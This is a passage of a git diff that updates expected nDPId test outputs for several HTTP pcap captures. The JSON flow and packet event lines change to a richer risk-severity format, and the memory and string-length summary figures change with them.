 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0t6tAAHkGyLLAqAABwKgAFJlEemkrolmxAAAAAIAC+vBZugAAAgQFtAEBBAIBAwMG"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1593713340401,"pkt":"YDjgxTWgABjzZLGICABFAAA0AABAALIGR17AqAAUwKgAAXppmUT8ca\/AK6JZsoAS+vCBjAAAAgQFtAEBBAIBAwMH"}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAAot6xAAHkGyL3AqAABwKgAFJlEemkrolmy\/HGvwVAQA+zlTAAAAAAAAAAA"}
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}}
-00711{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}}
+00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00164{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 14/14
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595265 bytes
-~~ total memory freed........: 4595265 bytes
-~~ total allocations/frees...: 99569/99569
+~~ total memory allocated....: 4680218 bytes
+~~ total memory freed........: 4680218 bytes
+~~ total allocations/frees...: 101159/101159
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 169 chars
-~~ json string max len.......: 770 chars
-~~ json string avg len.......: 525 chars
+~~ json string max len.......: 879 chars
+~~ json string avg len.......: 574 chars
diff --git a/test/results/http-manipulated.pcap.out b/test/results/http-manipulated.pcap.out
index d0cc3df6c..0f3092a95 100644
--- a/test/results/http-manipulated.pcap.out
+++ b/test/results/http-manipulated.pcap.out
@@ -3,14 +3,14 @@
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAA0umlAAI8Gr+7AqAAUwKgAB4NgH5BugXMeAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":946727901369,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg2CKV04jboFzH4AS+vCVmQAAAgQFtAEBBAIBAwMG"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAAoumpAAI8Gr\/nAqAAUwKgAB4NgH5BugXMfildOJFAQAfaBhgAA"}
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}}
-00704{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}}
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAA0svlAAL4GiF7AqAAUwKgAB4OUH5ARN20zAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":946729142063,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg5SNfRmbETdtNIAS+vAp\/QAAAgQFtAEBBAIBAwMG"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAAosvpAAL4GiGnAqAAUwKgAB4OUH5ARN200jX0ZnFAQAfaBhgAA"}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}}
-00713{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00980{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}}
+00822{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00166{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","total-events-serialized":14}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 328/328
@@ -20,10 +20,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4605722 bytes
-~~ total memory freed........: 4605722 bytes
-~~ total allocations/frees...: 99891/99891
+~~ total memory allocated....: 4690347 bytes
+~~ total memory freed........: 4690347 bytes
+~~ total allocations/frees...: 101481/101481
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 171 chars
-~~ json string max len.......: 876 chars
-~~ json string avg len.......: 587 chars
+~~ json string max len.......: 985 chars
+~~ json string avg len.......: 642 chars
diff --git a/test/results/http_auth.pcap.out b/test/results/http_auth.pcap.out
index 15940b8b9..bd20f4f85 100644
--- a/test/results/http_auth.pcap.out
+++ b/test/results/http_auth.pcap.out
@@ -3,8 +3,8 @@
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1381844050222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1381844050222,"pkt":"TBfruiThKM\/pITwrCABFAABARSdAAEAGtjzAqAAEwP69qdRBAFCa4jGyAAAAALAC\/\/8jTAAAAgQFtAEDAwQBAQgKH38TuAAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1381844050402,"pkt":"KM\/pITwrTBfruiThCABFAAA8AABAADgGA2jA\/r2pwKgABABQ1EEDZtH9muIxs6ASOJA\/hAAAAgQFtAQCCAowzbX3H38TuAEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1381844050402,"pkt":"TBfruiThKM\/pITwrCABFAAA0XSJAAEAGnk3AqAAEwP69qdRBAFCa4jGzA2bR\/oAQICuGBAAAAQEICh9\/FGkwzbX3"}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}}
-00648{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}}
+00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 33/33
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595968 bytes
-~~ total memory freed........: 4595968 bytes
-~~ total allocations/frees...: 99590/99590
+~~ total memory allocated....: 4680921 bytes
+~~ total memory freed........: 4680921 bytes
+~~ total allocations/frees...: 101180/101180
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 852 chars
-~~ json string avg len.......: 558 chars
+~~ json string max len.......: 878 chars
+~~ json string avg len.......: 569 chars
diff --git a/test/results/http_ipv6.pcap.out b/test/results/http_ipv6.pcap.out
index 49fe888b0..5d91faae1 100644
--- a/test/results/http_ipv6.pcap.out
+++ b/test/results/http_ipv6.pcap.out
@@ -7,7 +7,7 @@
 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1448269127395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":124,"pkt_l4_len":70,"ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAEYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcyYKcmsggBgBYRWcAAABAQgKEg1sPOPdU5wXAwMAISEEhc9+XaFrGjMSta2tz\/npJ9wouC3HutuqGdJZFlD+8g=="}
 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02268{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1448269127400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"ts_msec":1448269127400,"pkt":"UMWNrEEBeKzApw1Mht1gAAAABU4RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwVOGq8NSb7i0\/DtzNZRMDI1AdhpfiGrZQ0z8Xo88wCgAQAEQ0hMTxcAAABQQUQAlQEAAFNOSQCiAQAAU1RLANwBAABWRVIA4AEAAENDUwDoAQAATk9OQwgCAABNU1BDDAIAAEFFQUQQAgAAVUFJRDACAABTQ0lEQAIAAFRDSUREAgAAUERNREgCAABTUkJGTAIAAElDU0xQAgAAUFVCU3ACAABTQ0xTdAIAAEtFWFN4AgAAQ09QVHgCAABDQ1JUkAIAAElSVFSUAgAAQ0VUVjgDAABDRkNXPAMAAFNGQ1dAAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0td3d3Lmdvb2dsZS5pdP6VATCysYcS+6UyHFs91qYSgNdeDzmk0IEyIe5t2+bJKAI2qamMt0i7KMYplR0K0jnCGwmAm\/d3HOJRMDI1eybp5+Rccf9WUtVHu\/cGtxBbc83x\/ixhHuZYGb85GDRSl0WTDzqXHGQAAABDQzEyQ2hyb21lLzQ2LjAuMjQ5MC44MCBMaW51eCB4ODZfNjRJY0N+fBRzPpi9ZOX2cffRAAAAAFg1MDkAABAAHgAAAKnIKfkyK+SzUnB6164ARpx8JYjcWyR0opR8VfpSZa5LAQAAAEMyNTWqEkFTJwbowuJjGoJ9cYVfQAt7kKmueesKxAMAMPg3G85FTSE++LOaAtQpI1KVeq729JfhjhoCsaupNHH2PFh7nIyQFBUHu\/yG69qYF+ZOXnLeZQlagMSAtKsuormBERnE1N5BArSjLGqyjEsI7xMsjf+GWiD9zqRxEMc6cBgFvzaEvMvxi2SGPZg7npVciNOVP9ZU7k0lklFQEmkIVXhAz857PhdAM9F8uaoJzSnjSvvppgNKNbAOmmtmPDeC+pIAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA